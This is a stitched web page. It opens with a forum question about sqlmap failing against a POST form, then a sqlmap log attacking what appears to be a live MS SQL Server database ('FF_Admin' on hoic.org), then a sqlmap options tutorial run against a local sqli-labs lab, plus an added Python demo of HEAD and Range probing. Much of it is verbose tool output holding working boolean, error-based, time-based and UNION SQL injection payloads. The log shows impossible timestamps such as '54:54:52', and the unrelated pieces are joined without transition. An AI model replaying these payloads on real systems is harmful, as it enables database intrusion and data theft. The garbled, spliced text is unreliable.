Http error codes detected during run


For academic purposes I need to exploit a blind SQL injection on a form parameter which is sent using the POST method. The form is very simple: it just has a text input box where to introduce the name of a user and a submit button, and the output produced just informs about the existence or not of the introduced user. The HTML code is:

<html>
<head>
      <title>User info</title>
</head>...

<p> Introduce an user to check if it's in the database </p>   
<form method="post">
      User <input type="text" value="" name="user">
      <input type="submit" value="Check!">
</form>
<hr>
</center>
</html>

I know that 'guest' is a valid user name (it returns true) and I've checked manually that it's vulnerable to blind SQL injection by introducing guest' and '1'='1 (which returns true), and guest' and '1' = '0 (which returns false). Once sure that it's vulnerable I've tried to use sqlmap to exploit the vulnerability using the following command:

# sqlmap -u  "http://foo.com/checkuserform" --method "POST" --data "user=guest" --dbms "mysql" -p "user"

But it seems not being able to explode the vulnerability:

    ...
    **[00:23:01] [WARNING] the web server responded with an HTTP error code (405) which could interfere with the results of the tests**
    [00:23:01] [INFO] testing if the target URL is stable
    [00:23:02] [INFO] target URL is stable
    [00:23:02] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
    ...
    **[00:23:18] [WARNING] POST parameter 'user' is not injectable**
    [00:23:18] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
    [00:23:18] [WARNING] HTTP error codes detected during run:
    405 (Method Not Allowed) - 175 times

Apart from not being able to exploit the vulnerability, what surprises me is the HTTP 405 error, since I've forced the use of POST in the sqlmap command (and I'm not able to reproduce this error if I check it manually with a browser). I've also tried increasing the values of the level and risk parameters without success. Do you have any clue why it's happening?


[54:54:52] [DEBUG] cleaning up configuration parameters
[54:54:52] [DEBUG] setting the HTTP timeout
[54:54:52] [DEBUG] setting the HTTP User-Agent header
[54:54:52] [DEBUG] loading random HTTP User-Agent header(s) from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[54:54:52] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5 (KHTML, like Gecko) Safari/125.9' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[54:54:52] [DEBUG] creating HTTP requests opener object
[54:54:54] [WARNING] it appears that you have provided tainted parameter values ('id=»') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[54:54:59] [INFO] resuming back-end DBMS 'microsoft sql server'
[54:54:59] [DEBUG] resolving hostname 'hoic.org'
[54:55:00] [INFO] testing connection to the target URL
[54:55:00] [DEBUG] declared web page charset 'iso-8859-1'
[54:55:00] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[54:55:00] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('ASPSESSIONIDQCTATTCR=NFPDIAFAEEF…MLJGFMAFKE'). Do you want to use those [Y/n] y
[54:55:05] [DEBUG] resuming NULL connection method 'HEAD'
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=';WAITFOR DELAY '0:0:5'--
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
Payload: id=' WAITFOR DELAY '0:0:5'--
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

[54:55:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2012
[54:55:05] [INFO] fetching tables for database: FF_Admin
[54:55:05] [INFO] fetching number of tables for database 'FF_Admin'
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] n
[54:55:08] [PAYLOAD] ' IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>51) WAITFOR DELAY '0:0:5'--
[54:55:08] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[54:55:08] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
...
[54:55:16] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[54:55:16] [PAYLOAD] ' IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>48) WAITFOR DELAY '0:0:5'--
[54:55:16] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[54:55:16] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[54:55:16] [PAYLOAD] ' IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM FF_Admin..sysobjects WHERE FF_Admin..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>9) WAITFOR DELAY '0:0:5'--
[54:55:16] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[54:55:16] [INFO] retrieved:
[54:55:16] [DEBUG] performed 3 queries in 10.99 seconds
[54:55:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[54:55:16] [INFO] resumed: 0
[54:55:16] [DEBUG] performed 0 queries in 0.01 seconds
[54:55:16] [CRITICAL] unable to retrieve the tables for any database
[54:55:16] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 34 times

Table of contents

  • 1. sqlmap performance optimization
    • 1. sqlmap: setting a persistent HTTP connection
    • 2. sqlmap: not retrieving the HTTP body
    • 3. sqlmap: setting multithreading
    • 4. One-click optimization
  • 2. sqlmap detection parameters
    • 1. sqlmap: setting the detection level
    • 2. sqlmap: setting the risk level
  • 3. sqlmap injection at a specified location
    • 1. sqlmap: specifying the parameters to inject
      • -p parameter (test):
      • --skip parameter (skip testing parameters):
    • 2. sqlmap: setting the injection point in the URI
  • 4. sqlmap injection parameters
    • 1. sqlmap: forcing the DBMS
    • 2. sqlmap: forcing the OS
    • 3. sqlmap: forcing invalid value replacement
      • --invalid-bignum parameter
      • --invalid-logical parameter
      • --invalid-string parameter
    • 4. sqlmap: custom injection payload position
    • 5. sqlmap: tamper scripts
    • 6. sqlmap: DBMS authentication
  • 5. sqlmap injection technique parameters
    • 1. sqlmap: setting a specific SQL injection technique
    • 2. sqlmap: setting the blind injection delay time
    • 3. sqlmap: setting the number of UNION columns
    • 4. sqlmap: setting the UNION character
    • 5. sqlmap: setting the UNION query table
    • 6. sqlmap fingerprinting

1. sqlmap performance optimization

1. sqlmap: setting a persistent HTTP connection

In sqlmap the connection can be made persistent, which sets Connection: keep-alive in the HTTP request.
A persistent connection lowers the per-request connection overhead but ties up server resources.

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --keep-alive --banner -v 5

Output:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:06:39 /2020-02-29/

[17:06:39] [DEBUG] cleaning up configuration parameters
[17:06:40] [DEBUG] setting the HTTP timeout
[17:06:40] [DEBUG] setting the HTTP User-Agent header
[17:06:40] [DEBUG] creating HTTP requests opener object
[17:06:40] [INFO] resuming back-end DBMS 'mysql'
[17:06:40] [INFO] testing connection to the target URL
[17:06:40] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)
Host: 127.0.0.1
Accept: */*
Accept-encoding: gzip,deflate
Connection: keep-alive

[17:06:40] [DEBUG] declared web page charset 'utf-8'
[17:06:40] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 09:06:40 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 6613=6613 AND 'wyLD'='wyLD
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4185 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(4185=4185,1))),0x71706a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aqQg'='aqQg
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4770 FROM (SELECT(SLEEP(5)))RbSZ) AND 'xahz'='xahz
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9218' UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x4e6a506169494f6c654a42614659426f70457a4f77454d4f494c415144525967626d41745067674a,0x71706a7871)-- -
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
[17:06:40] [INFO] the back-end DBMS is MySQL
[17:06:40] [INFO] fetching banner
[17:06:40] [DEBUG] resuming configuration option 'string' ('Your')
[17:06:40] [DEBUG] performed 0 queries in 0.00 seconds
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:06:40] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 17:06:40 /2020-02-29/

Sure enough, Keep-Alive: timeout=5, max=100 now appears in the response; without the --keep-alive option it shows Connection: close.
When using a persistent connection you cannot set a proxy at the same time, otherwise the two conflict, for example:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --keep-alive --banner --proxy "http://218.18.158.216:8000" -v 5

Output:

        ___                                                                                                                                               
       __H__                                                                                                                                              
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}                                                                                                                  
|_ -| . [(]     | .'| . |                                                                                                                                 
|___|_  [,]_|_|_|__,|  _|                                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                                               
                                                                                                                                                          
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program               
                                                                                                                                                          
[*] starting @ 17:20:32 /2020-02-29/                                                                                                                      
                                                                                                                                                          
[17:20:32] [DEBUG] cleaning up configuration parameters                                                                                                   
[17:20:32] [DEBUG] setting the HTTP timeout                                                                                                               
[17:20:32] [DEBUG] setting the HTTP User-Agent header                                                                                                     
[17:20:32] [DEBUG] setting the HTTP/SOCKS proxy for all HTTP requests                                                                                     
[17:20:32] [DEBUG] creating HTTP requests opener object                                                                                                   
[17:20:32] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of its incompatibility with HTTP(s) proxy                      
[17:20:33] [INFO] resuming back-end DBMS 'mysql'                                                                                                          
[17:20:33] [INFO] testing connection to the target URL                                                                                                    
[17:20:33] [TRAFFIC OUT] HTTP request [#1]:                                                                                                               
GET /sqli-labs/Less-1/?id=1 HTTP/1.1                                                                                                                      
Cache-control: no-cache                                                                                                                                   
User-agent: sqlmap/1.4.2.31#dev (http://sqlmap.org)                                                                                                       
Host: 127.0.0.1                                                                                                                                           
Accept: */*                                                                                                                                               
Accept-encoding: gzip,deflate                                                                                                                             
Connection: keep-alive                                                                                                                                    
                                                                                                                                                          
[17:20:34] [DEBUG] declared web page charset 'utf-8'                                                                                                      
[17:20:34] [TRAFFIC IN] HTTP response [#1] (404 Not Found):                                                                                               
Date: Sat, 29 Feb 2020 09:20:33 GMT                                                                                                                       
Content-Type: text/html; charset=utf-8                                                                                                                    
Vary: Accept-Encoding                                                                                                                                     
X-Cache: MISS from KX-S42-Web-85                                                                                                                          
X-Cache-Lookup: MISS from KX-S42-Web-85:3128                                                                                                              
Via: 1.0 KX-S42-Web-85 (squid/3.1.23)                                                                                                                     
Connection: close                                                                                                                                         
URI: http://127.0.0.1:80/sqli-labs/Less-1/?id=1                                                                                                           
[17:20:34] [CRITICAL] page not found (404)                                                                                                                
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]                      
                                                                                                                                                          
[17:20:38] [WARNING] HTTP error codes detected during run:                                                                                                
404 (Not Found) - 1 times                                                                                                                                 
                                                                                                                                                          
[*] ending @ 17:20:38 /2020-02-29/                                                                                                                        
                                                                                                                                                          

The output shows the Connection header: with a proxy configured, the connection is closed even if a persistent (keep-alive) connection was requested, i.e. --keep-alive has no effect.

2. sqlmap without receiving the HTTP body

Parameter:
--null-connection
Tells sqlmap to use a NULL connection, i.e. not to receive the HTTP response body;
it obtains the size of the HTTP response directly without fetching the body;
this is often used for blind injection, and skipping the HTTP body reduces network bandwidth consumption.
Tested in Kali:

sqlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --null-connection --banner -v 5

Output:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.8#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:43:01 /2020-02-29/

[17:43:01] [DEBUG] cleaning up configuration parameters
[17:43:01] [DEBUG] setting the HTTP timeout
[17:43:01] [DEBUG] setting the HTTP User-Agent header
[17:43:01] [DEBUG] creating HTTP requests opener object
[17:43:01] [INFO] resuming back-end DBMS 'mysql' 
[17:43:01] [INFO] testing connection to the target URL
[17:43:01] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: gzip,deflate
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close

[17:43:01] [DEBUG] declared web page charset 'utf-8'
[17:43:01] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 09:43:00 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [INFO] testing NULL connection to the target URL
[17:43:01] [TRAFFIC OUT] HTTP request [#2]:
HEAD /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: identity
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close

[17:43:01] [TRAFFIC IN] HTTP response [#2] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [TRAFFIC OUT] HTTP request [#3]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Accept-encoding: identity
Cache-control: no-cache
Range: bytes=-1
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close

[17:43:01] [TRAFFIC IN] HTTP response [#3] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
[17:43:01] [TRAFFIC OUT] HTTP request [#4]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: identity
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close

[17:43:01] [TRAFFIC IN] HTTP response [#4] (200 OK):
Date: Sat, 29 Feb 2020 09:43:01 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5740=5740 AND 'mIdv'='mIdv
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x71767a7a71,(SELECT (ELT(1690=1690,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cbli'='Cbli
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2810 FROM (SELECT(SLEEP(5)))iZjP) AND 'aeqh'='aeqh
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9925' UNION ALL SELECT NULL,CONCAT(0x71767a7a71,0x4f6c754f767965706a664f514845696874654a594457514e564e4a53734a75776a73535653785375,0x716b6b7871),NULL-- NsvS
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]
---
[17:43:01] [INFO] the back-end DBMS is MySQL
[17:43:01] [INFO] fetching banner
[17:43:01] [DEBUG] resuming configuration option 'string' ('Your')
[17:43:01] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:43:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:43:01] [WARNING] you haven't updated sqlmap for more than 210 days!!!

[*] ending @ 17:43:01 /2020-02-29/
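
In the traffic above, request #2 is a HEAD and request #3 a GET carrying Range: bytes=-1; these are the two ways sqlmap measures a response without transferring its body. The following Python script is an added example, not part of the original post and not sqlmap's own code: it starts a small range-aware HTTP server on 127.0.0.1 (serving a constructed stand-in for the Less-1 page) and sends the three request shapes, returning for each the page size learned from the headers and how many body bytes were actually received. The handler, the sample body and the helper names are assumptions of this example.

```python
"""Added example (not from the page or sqlmap): what NULL-connection probes do on the wire."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the target page body (the real Less-1 page is larger).
PAGE_BODY = b"<html><body>Your Login name:Dumb<br>Your Password:Dumb</body></html>"
PATH = "/sqli-labs/Less-1/?id=1"


class RangeAwareHandler(BaseHTTPRequestHandler):
    """Tiny server that answers HEAD and the suffix range 'bytes=-N' the way a normal
    web server does, so a client can learn the response size without the body."""

    def log_message(self, *args):
        pass  # keep the demo quiet

    def _common_headers(self):
        self.send_header("Content-Type", "text/html; charset=UTF-8")

    def do_HEAD(self):
        # HEAD: status and headers only; Content-Length still states the full size.
        self.send_response(200)
        self._common_headers()
        self.send_header("Content-Length", str(len(PAGE_BODY)))
        self.end_headers()

    def do_GET(self):
        total = len(PAGE_BODY)
        rng = self.headers.get("Range", "")
        if rng.startswith("bytes=-"):
            # Suffix range: serve only the last N bytes; Content-Range reveals the total.
            start = max(total - int(rng[len("bytes=-"):]), 0)
            chunk = PAGE_BODY[start:]
            self.send_response(206)
            self._common_headers()
            self.send_header("Content-Range", f"bytes {start}-{total - 1}/{total}")
            self.send_header("Content-Length", str(len(chunk)))
            self.end_headers()
            self.wfile.write(chunk)
            return
        self.send_response(200)
        self._common_headers()
        self.send_header("Content-Length", str(total))
        self.end_headers()
        self.wfile.write(PAGE_BODY)


def probe(port, method, headers=None):
    """Issue one request; return (status, page size learned from headers, body bytes read)."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request(method, PATH, headers=headers or {})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    content_range = resp.getheader("Content-Range")
    if content_range:                       # "bytes 67-67/68" -> 68
        size = int(content_range.rsplit("/", 1)[1])
    else:
        size = int(resp.getheader("Content-Length"))
    return resp.status, size, len(body)


def null_connection_demo():
    """Compare a normal GET with the two NULL-connection techniques."""
    server = HTTPServer(("127.0.0.1", 0), RangeAwareHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    port = server.server_address[1]
    try:
        return {
            "full_get": probe(port, "GET"),
            "head": probe(port, "HEAD"),
            "suffix_range": probe(port, "GET", {"Range": "bytes=-1"}),
        }
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for name, (status, size, got) in null_connection_demo().items():
        print(f"{name:13s} status={status} page_size={size} body_bytes_received={got}")
```

The result to take from the run is that both HEAD and the suffix range yield the full page size (from Content-Length and Content-Range respectively) while receiving 0 and 1 body bytes. A server that ignores Range and answers 200 with the whole body makes the optimisation useless, which is why sqlmap first tests whether a NULL connection is possible before relying on it.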


3. sqlmap multithreading

Parameter:
--threads (the commands below use the abbreviated spelling --thread, which sqlmap's option parser also accepts)
Sets the number of threads sqlmap uses, i.e. how many HTTP requests are sent concurrently.
Tested in Kali:

sqlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --thread 10 --banner -v 5

Output:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.8#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:46:39 /2020-02-29/

[17:46:39] [DEBUG] cleaning up configuration parameters
[17:46:39] [DEBUG] setting the HTTP timeout
[17:46:39] [DEBUG] setting the HTTP User-Agent header
[17:46:39] [DEBUG] creating HTTP requests opener object
[17:46:40] [INFO] resuming back-end DBMS 'mysql' 
[17:46:40] [INFO] testing connection to the target URL
[17:46:40] [TRAFFIC OUT] HTTP request [#1]:
GET /sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.0.103
Cache-control: no-cache
Accept-encoding: gzip,deflate
Accept: */*
User-agent: sqlmap/1.3.8#stable (http://sqlmap.org)
Connection: close

[17:46:40] [DEBUG] declared web page charset 'utf-8'
[17:46:40] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Sat, 29 Feb 2020 09:46:39 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a
X-Powered-By: PHP/7.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
URI: http://192.168.0.103:80/sqli-labs/Less-1/?id=1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5740=5740 AND 'mIdv'='mIdv
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x71767a7a71,(SELECT (ELT(1690=1690,1))),0x716b6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cbli'='Cbli
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2810 FROM (SELECT(SLEEP(5)))iZjP) AND 'aeqh'='aeqh
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9925' UNION ALL SELECT NULL,CONCAT(0x71767a7a71,0x4f6c754f767965706a664f514845696874654a594457514e564e4a53734a75776a73535653785375,0x716b6b7871),NULL-- NsvS
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]
---
[17:46:40] [INFO] the back-end DBMS is MySQL
[17:46:40] [INFO] fetching banner
[17:46:40] [DEBUG] resuming configuration option 'string' ('Your')
[17:46:40] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: PHP 7.3.4, Apache 2.4.39
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[17:46:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.103'
[17:46:40] [WARNING] you haven't updated sqlmap for more than 210 days!!!

[*] ending @ 17:46:40 /2020-02-29/


Detection finished almost immediately, probably because of cached results. Delete the /root/.sqlmap/output/192.168.0.103 directory and run the check again.

sqlmap -u http://192.168.0.103/sqli-labs/Less-1/?id=1 --thread 10 --banner

Output:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.8#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:52:01 /2020-02-29/

[17:52:01] [INFO] testing connection to the target URL
[17:52:01] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:52:01] [INFO] testing if the target URL content is stable
[17:52:02] [INFO] target URL content is stable
[17:52:02] [INFO] testing if GET parameter 'id' is dynamic
[17:52:02] [INFO] GET parameter 'id' appears to be dynamic
[17:52:02] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[17:52:02] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[17:52:02] [INFO] testing for SQL injection on GET parameter 'id'
[17:52:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'ing provided level (1) and risk (1) values? [Y/n] 
[17:52:05] [WARNING] reflective value(s) found and filtering out
[17:52:05] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[17:52:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:52:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:52:05] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:52:05] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:52:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:52:05] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[17:52:05] [INFO] testing 'MySQL inline queries'
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[17:52:05] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)                            
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:52:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
